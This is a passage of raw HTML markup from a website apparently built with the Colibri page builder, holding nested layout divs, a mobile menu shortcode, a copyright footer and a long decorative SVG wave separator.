style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-start align-items-md-start align-items-start style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path 